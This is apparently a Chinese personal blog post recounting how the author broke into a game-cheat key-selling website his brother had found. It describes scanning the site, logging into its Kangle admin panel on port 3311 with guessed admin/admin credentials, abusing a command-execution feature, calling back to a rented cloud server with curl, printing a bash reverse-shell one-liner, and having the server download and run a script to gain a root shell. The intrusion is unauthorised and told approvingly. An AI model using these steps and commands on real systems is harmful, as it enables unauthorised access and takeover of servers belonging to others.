一天下午我在家吃着苹果,苹果又大又红,还甜,吃着吃着,一条消息映入的我的眼帘,俺弟弟不知道从哪搞的发卡网说想买cdk,发过来那个网址。我连忙说你先别买,我先看看。说着我打开了那个网页。
2021-01-24T08:34:28.png
就长这样(千万记住别开挂,开挂一直爽,
随机打开电脑一顿操作,开始了我的遨游....
2021-01-24T08:35:43.png
话不多说先来明面上扫一遍(信息收集https://scan.top15.cn/web/
2021-01-24T08:36:04.png
2021-01-24T08:36:12.png
发现开了3311端(之前一直不知道这个端口是什么设备,现在知道了),打开之后是连接登入(盲猜一波是admin admin)登进去了
2021-01-24T08:36:28.png
就这个样,是个kangle(康乐,经表哥询问才知道)
得到这个之后,一瞬间没什么思路,那就一个个,只要能getshell的人就是好人。
2021-01-24T08:36:38.png
经过长时间度娘和自己的翻看终于找到了,在这里貌似能执行命令
2021-01-24T08:36:46.png
真是柳暗花明又一村
2021-01-24T08:36:51.png
接下来就操作了(这里我为了继续深入还专门买了个某里云服务器,花了我96块大洋)
一开始curl反弹不了任何东西,我还以为我命令输错了,试了好多次,一直没有返回任何信息,结果查看其它板块的时候貌似必须带路径比如:/usr/bin/curl http://ip:port
惊喜就来了
2021-01-24T08:36:59.png
成功反弹,那接下里,嘿嘿嘿
2021-01-24T08:37:08.png
反弹shell吧,写个shell
/usr/bin/bash -i >& /dev/tcp/ip/9999 0>&1
然后执行,漫长的等待....
啥也没等到.jpg
我在想是不是有什么防火墙啥的挡住了。
我又开始写python脚本,让他下载我的脚本,然后从里面执行,说干就干
2021-01-24T08:37:16.png
弄了一下apache和mini.httpd,然后放到了我的服务器
开始执行命令吧
2021-01-24T08:37:22.png
结果我也不知道有没有,等了有几分钟,我开始执行脚本了
2021-01-24T08:37:31.png
滴!你有新的shell上线了,请注意查收!(关键还是root权限)
2021-01-24T08:37:39.png
2021-01-24T08:40:20.png
这就成了?还不满意,继续呗,接下来就不操作了,毕竟点到为止,结尾发生了点意外,就不说明了。(抵制外挂,奥利给)


**作者:JK1706 团队:未命名安全团队**